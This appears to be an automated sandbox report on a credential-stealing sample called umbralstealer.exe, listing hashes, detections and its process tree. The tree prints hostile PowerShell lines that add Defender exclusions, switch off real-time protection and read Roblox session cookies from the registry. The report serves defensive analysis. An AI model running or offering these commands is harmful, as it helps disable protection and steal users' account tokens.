Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
03-09-2024 13:05
Behavioral task
behavioral1
Sample
umbralstealer.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
umbralstealer.exe
Resource
win10v2004-20240802-en
General
-
Target
umbralstealer.exe
-
Size
229KB
-
MD5
83b81dda82a62350b52ee97a12d3163a
-
SHA1
3e7c9d5eda676771071fa77ce8f357b0c32673fa
-
SHA256
b8e51135b2e0a124ac1103a9c4a6f2353d289ffe99611d990c291ae356950ecf
-
SHA512
e0d0d47479b19287dbb731b0025c458623fa17e77d506756a7e90289abf0c04faa5e655bd2f521ead68d3c8530cb4ecaf1cb1c48e1fe2e03759affe8c0c4ca04
-
SSDEEP
6144:lloZM9fsXtioRkts/cnnK6cMlxDKxX8il927De8NhoREb8e1muoi:noZXtlRk83MlxDKxX8il927De8NhoOJ
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2568-1-0x0000000000070000-0x00000000000B0000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2388 powershell.exe 2656 powershell.exe 2912 powershell.exe 2860 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts umbralstealer.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1280 wmic.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2388 powershell.exe 2860 powershell.exe 2656 powershell.exe 2692 powershell.exe 2912 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2568 umbralstealer.exe Token: SeDebugPrivilege 2388 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeDebugPrivilege 2656 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe Token: SeIncreaseQuotaPrivilege 1700 wmic.exe Token: SeSecurityPrivilege 1700 wmic.exe Token: SeTakeOwnershipPrivilege 1700 wmic.exe Token: SeLoadDriverPrivilege 1700 wmic.exe Token: SeSystemProfilePrivilege 1700 wmic.exe Token: SeSystemtimePrivilege 1700 wmic.exe Token: SeProfSingleProcessPrivilege 1700 wmic.exe Token: SeIncBasePriorityPrivilege 1700 wmic.exe Token: SeCreatePagefilePrivilege 1700 wmic.exe Token: SeBackupPrivilege 1700 wmic.exe Token: SeRestorePrivilege 1700 wmic.exe Token: SeShutdownPrivilege 1700 wmic.exe Token: SeDebugPrivilege 1700 wmic.exe Token: SeSystemEnvironmentPrivilege 1700 wmic.exe Token: SeRemoteShutdownPrivilege 1700 wmic.exe Token: SeUndockPrivilege 1700 wmic.exe Token: SeManageVolumePrivilege 1700 wmic.exe Token: 33 1700 wmic.exe Token: 34 1700 wmic.exe Token: 35 1700 wmic.exe Token: SeIncreaseQuotaPrivilege 1700 wmic.exe Token: SeSecurityPrivilege 1700 wmic.exe Token: SeTakeOwnershipPrivilege 1700 wmic.exe Token: SeLoadDriverPrivilege 1700 wmic.exe Token: SeSystemProfilePrivilege 1700 wmic.exe Token: SeSystemtimePrivilege 1700 wmic.exe Token: SeProfSingleProcessPrivilege 1700 wmic.exe Token: SeIncBasePriorityPrivilege 1700 wmic.exe Token: SeCreatePagefilePrivilege 1700 wmic.exe Token: SeBackupPrivilege 1700 wmic.exe Token: SeRestorePrivilege 1700 wmic.exe Token: SeShutdownPrivilege 1700 wmic.exe Token: SeDebugPrivilege 1700 wmic.exe Token: SeSystemEnvironmentPrivilege 1700 wmic.exe Token: SeRemoteShutdownPrivilege 1700 wmic.exe Token: SeUndockPrivilege 1700 wmic.exe Token: SeManageVolumePrivilege 1700 wmic.exe Token: 33 1700 wmic.exe Token: 34 1700 wmic.exe Token: 35 1700 wmic.exe Token: SeIncreaseQuotaPrivilege 1252 wmic.exe Token: SeSecurityPrivilege 1252 wmic.exe Token: SeTakeOwnershipPrivilege 1252 wmic.exe Token: SeLoadDriverPrivilege 1252 wmic.exe Token: SeSystemProfilePrivilege 1252 wmic.exe Token: SeSystemtimePrivilege 1252 wmic.exe Token: SeProfSingleProcessPrivilege 1252 wmic.exe Token: SeIncBasePriorityPrivilege 1252 wmic.exe Token: SeCreatePagefilePrivilege 1252 wmic.exe Token: SeBackupPrivilege 1252 wmic.exe Token: SeRestorePrivilege 1252 wmic.exe Token: SeShutdownPrivilege 1252 wmic.exe Token: SeDebugPrivilege 1252 wmic.exe Token: SeSystemEnvironmentPrivilege 1252 wmic.exe Token: SeRemoteShutdownPrivilege 1252 wmic.exe Token: SeUndockPrivilege 1252 wmic.exe Token: SeManageVolumePrivilege 1252 wmic.exe Token: 33 1252 wmic.exe Token: 34 1252 wmic.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2568 wrote to memory of 2388 2568 umbralstealer.exe 30 PID 2568 wrote to memory of 2388 2568 umbralstealer.exe 30 PID 2568 wrote to memory of 2388 2568 umbralstealer.exe 30 PID 2568 wrote to memory of 2860 2568 umbralstealer.exe 32 PID 2568 wrote to memory of 2860 2568 umbralstealer.exe 32 PID 2568 wrote to memory of 2860 2568 umbralstealer.exe 32 PID 2568 wrote to memory of 2656 2568 umbralstealer.exe 34 PID 2568 wrote to memory of 2656 2568 umbralstealer.exe 34 PID 2568 wrote to memory of 2656 2568 umbralstealer.exe 34 PID 2568 wrote to memory of 2692 2568 umbralstealer.exe 36 PID 2568 wrote to memory of 2692 2568 umbralstealer.exe 36 PID 2568 wrote to memory of 2692 2568 umbralstealer.exe 36 PID 2568 wrote to memory of 1700 2568 umbralstealer.exe 38 PID 2568 wrote to memory of 1700 2568 umbralstealer.exe 38 PID 2568 wrote to memory of 1700 2568 umbralstealer.exe 38 PID 2568 wrote to memory of 1252 2568 umbralstealer.exe 41 PID 2568 wrote to memory of 1252 2568 umbralstealer.exe 41 PID 2568 wrote to memory of 1252 2568 umbralstealer.exe 41 PID 2568 wrote to memory of 696 2568 umbralstealer.exe 43 PID 2568 wrote to memory of 696 2568 umbralstealer.exe 43 PID 2568 wrote to memory of 696 2568 umbralstealer.exe 43 PID 2568 wrote to memory of 2912 2568 umbralstealer.exe 45 PID 2568 wrote to memory of 2912 2568 umbralstealer.exe 45 PID 2568 wrote to memory of 2912 2568 umbralstealer.exe 45 PID 2568 wrote to memory of 1280 2568 umbralstealer.exe 47 PID 2568 wrote to memory of 1280 2568 umbralstealer.exe 47 PID 2568 wrote to memory of 1280 2568 umbralstealer.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\umbralstealer.exe"C:\Users\Admin\AppData\Local\Temp\umbralstealer.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\umbralstealer.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1252
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2912
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1280
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GEZAWL7SZN5Y6TDGD3FR.temp
Filesize7KB
MD58981a3e6b9ced7539ff73bd8be410bc3
SHA162dfcd37bf9fbc863d24d3ad4df434d89841a553
SHA256beca44435b6cfae210f24a147e7467f13de4826d969fb1ddfe7897f6cc10da8b
SHA5127d83044c04ad9ef97ebe640c0a490154c08bb3c208d33208df15b3b13cad4b451176e3401cc5df3eb99815e6a8c52f99479e3052814b4ef39bdd0602162da3b7